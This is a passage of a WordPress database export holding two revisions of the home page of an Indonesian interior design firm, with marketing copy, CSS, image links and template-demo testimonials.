tidak hanya menciptakan desain interior yang estetis, tetapi juga mengubah ruang tempat tinggal atau tempat kerja Anda menjadi cerminan karakter dan selera pribadi Anda.</p><p>Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.</p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\n interior design consultant & contractor 							</h2>\n		<p>- Konsultasi perencanaan &amp; interior design</p><p>- Penyusunan Rencana Anggaran Belanja</p><p>- Produksi furniture dan pekerjaan sipil</p>		\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n	        				<h4>\n					Residential				</h4>\n		</a>\n					<p>\n				Kami memiliki keyakinan bahwa rumah adalah “Living Space” atau ruang hidup yang harus memberikan energi positif pada penghuninya. Setiap proyek residential merupakan usaha kami untuk mewujudkan ruang hidup yang selain nyaman juga mewakili kepribadian penghuninya.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n	        				<h4>\n					Commercial				</h4>\n		</a>\n					<p>\n				Menghadirkan ruang commercial yang tidak sekedar fungsional namun juga memiliki identitas serta nilai ekonomi adalah tantangan yang sering kami hadapi dalam proyek commercial.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n	        				<h4>\n					Office				</h4>\n		</a>\n					<p>\n				Pergeseran generasi telah mengubah ruang kantor menjadi ruang kolaborasi yang menjadi sumber inspirasi bagi karyawan di dalamnya.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n		</a>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why Bauhaus Living ?							</h2>\n							<p> Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas. </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Konsultasi gratis oleh team profesional\n									</li>\n								<li>\n										Interior design yang mewakili keunikan setiap klien\n									</li>\n								<li>\n										Design + Build Service menjadi kualitas pekerjaan \n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Kepuasan Pelanggan\n									100%\n				Kualitas Hasil dan Layanan\n									100%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"2560\" height=\"1920\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg 2560w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-300x225.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1024x768.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-768x576.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1536x1152.jpg 1536w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-2048x1536.jpg 2048w\" sizes=\"(max-width: 2560px) 100vw, 2560px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								Apa kata mereka tentang Bauhaus?							</h2>\n			<section>\n																																			<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/56947243_2426566684042502_6812443397089918976_n.jpg\" alt=\"Prijonno Nugroho\" >\n																							<p>\n													Prijonno Nugroho												</p>\n																							<p>\n													Action Coach Jakarta												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Kantor kami waktu itu menggunakan jasa dari Bauhaus hasilnnya memuaskan.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2023/09/24/high-quality-effective-inspiring-built-space/\" rel=\"bookmark\" title=\"High Quality, Effective &#038; Inspiring Built Space\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-03.jpg\" alt=\" High Quality, Effective &#038; Inspiring Built Space\">\n							</a>\n									24\n									September\n										<a href=\"https://bauhaus.futuremediatrix.com/2023/09/24/high-quality-effective-inspiring-built-space/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2023/09/24/high-quality-effective-inspiring-built-space/\" rel=\"bookmark\" title=\"High Quality, Effective &#038; Inspiring Built Space\">\n								High Quality, Effective &#038; Inspiring Built Space							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2023/09/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									September\n										<a href=\"https://bauhaus.futuremediatrix.com/2023/09/23/do-you-need-math-for-architecture/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2023/09/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2023/09/22/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									22\n									September\n										<a href=\"https://bauhaus.futuremediatrix.com/2023/09/22/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2023/09/22/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3> Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living</h3>\n														<h2>\n								Wujudkan mimpi anda sekarang!							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-09-26 13:14:13','2023-09-26 13:14:13','',22,'https://bauhaus.futuremediatrix.com/?p=4976',0,'revision','',0),(4977,3,'2023-09-26 13:14:13','2023-09-26 13:14:13','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927c-scaled.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-1065.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-9402.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								WELCOME TO BAUHAUS							</h2>\n		<p>Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living!</p><p>Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.</p><p>Kami tidak hanya menciptakan desain interior yang estetis, tetapi juga mengubah ruang tempat tinggal atau tempat kerja Anda menjadi cerminan karakter dan selera pribadi Anda.</p><p>Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.</p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.</p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\n interior design consultant & contractor 							</h2>\n		<p>- Konsultasi perencanaan &amp; interior design</p><p>- Penyusunan Rencana Anggaran Belanja</p><p>- Produksi furniture dan pekerjaan sipil</p>		\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n	        				<h4>\n					Residential				</h4>\n		</a>\n					<p>\n				Kami memiliki keyakinan bahwa rumah adalah “Living Space” atau ruang hidup yang harus memberikan energi positif pada penghuninya. Setiap proyek residential merupakan usaha kami untuk mewujudkan ruang hidup yang selain nyaman juga mewakili kepribadian penghuninya.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n	        				<h4>\n					Commercial				</h4>\n		</a>\n					<p>\n				Menghadirkan ruang commercial yang tidak sekedar fungsional namun juga memiliki identitas serta nilai ekonomi adalah tantangan yang sering kami hadapi dalam proyek commercial.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n	        				<h4>\n					Office				</h4>\n		</a>\n					<p>\n				Pergeseran generasi telah mengubah ruang kantor menjadi ruang kolaborasi yang menjadi sumber inspirasi bagi karyawan di dalamnya.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n		</a>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why Bauhaus Living ?							</h2>\n							<p> Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas. </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Konsultasi gratis oleh team profesional\n									</li>\n								<li>\n										Interior design yang mewakili keunikan setiap klien\n									</li>\n								<li>\n										Design + Build Service menjadi kualitas pekerjaan \n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Kepuasan Pelanggan\n									100%\n				Kualitas Hasil dan Layanan\n									100%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"2560\" height=\"1920\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-scaled.jpg 2560w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-300x225.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1024x768.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-768x576.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-1536x1152.jpg 1536w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878-2048x1536.jpg 2048w\" sizes=\"(max-width: 2560px) 100vw, 2560px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								Apa kata mereka tentang Bauhaus?							</h2>\n			<section>\n																																			<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/09/56947243_2426566684042502_6812443397089918976_n.jpg\" alt=\"Prijonno Nugroho\" >\n																							<p>\n													Prijonno Nugroho												</p>\n																							<p>\n													Action Coach Jakarta												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Kantor kami waktu itu menggunakan jasa dari Bauhaus hasilnnya memuaskan.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2023/09/24/high-quality-effective-inspiring-built-space/\" rel=\"bookmark\" title=\"High Quality, Effective &#038; Inspiring Built Space\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-03.jpg\" alt=\" High Quality, Effective &#038; Inspiring Built Space\">\n							</a>\n									24\n									September\n										<a href=\"https://bauhaus.futuremediatrix.com/2023/09/24/high-quality-effective-inspiring-built-space/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2023/09/24/high-quality-effective-inspiring-built-space/\" rel=\"bookmark\" title=\"High Quality, Effective &#038; Inspiring Built Space\">\n								High Quality, Effective &#038; Inspiring Built Space							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2023/09/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									September\n										<a href=\"https://bauhaus.futuremediatrix.com/2023/09/23/do-you-need-math-for-architecture/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2023/09/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2023/09/22/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									22\n									September\n										<a href=\"https://bauhaus.futuremediatrix.com/2023/09/22/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2023/09/22/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3> Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living</h3>\n														<h2>\n								Wujudkan mimpi anda sekarang!							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-09-26 13:14:13','2023-09-26 13:14:13','',22,'https://bauhaus.futuremediatrix.com/?p=4977',0,'revision','',0),(4979,2,'2023-09-26 13:20:45','2023-09-26 13:20:45','Have any question?						\n					<ul>\n								<li>\n																					<a href=\"tel:+021 22544768 \">\n													021 22544768												</a>\n																			</li>\n											</ul>\n							<h3>contact us</h3>\n														<h2>\n								Saatnya Impian Anda Menjadi Kenyataan!							</h2>\n							<p> Jangan kompromi dengan kualitas hidup Anda. Percayakan Bauhaus Living untuk mengubah ruang Anda menjadi tempat yang nyaman, fungsional, dan penuh gaya. Hubungi kami hari ini temukan clarity kebutuhan kenyamanan Anda dan mulailah perjalanan menuju interior yang menginspirasi! </p>\n							Write email						\n					<ul>\n								<li>\n																					<a href=\"mailto:info@bauhausliving.com \">\n													info@bauhausliving.com												</a>\n																			</li>\n											</ul>\n							Visit anytime 						\n					<ul>\n								<li>\n									<a 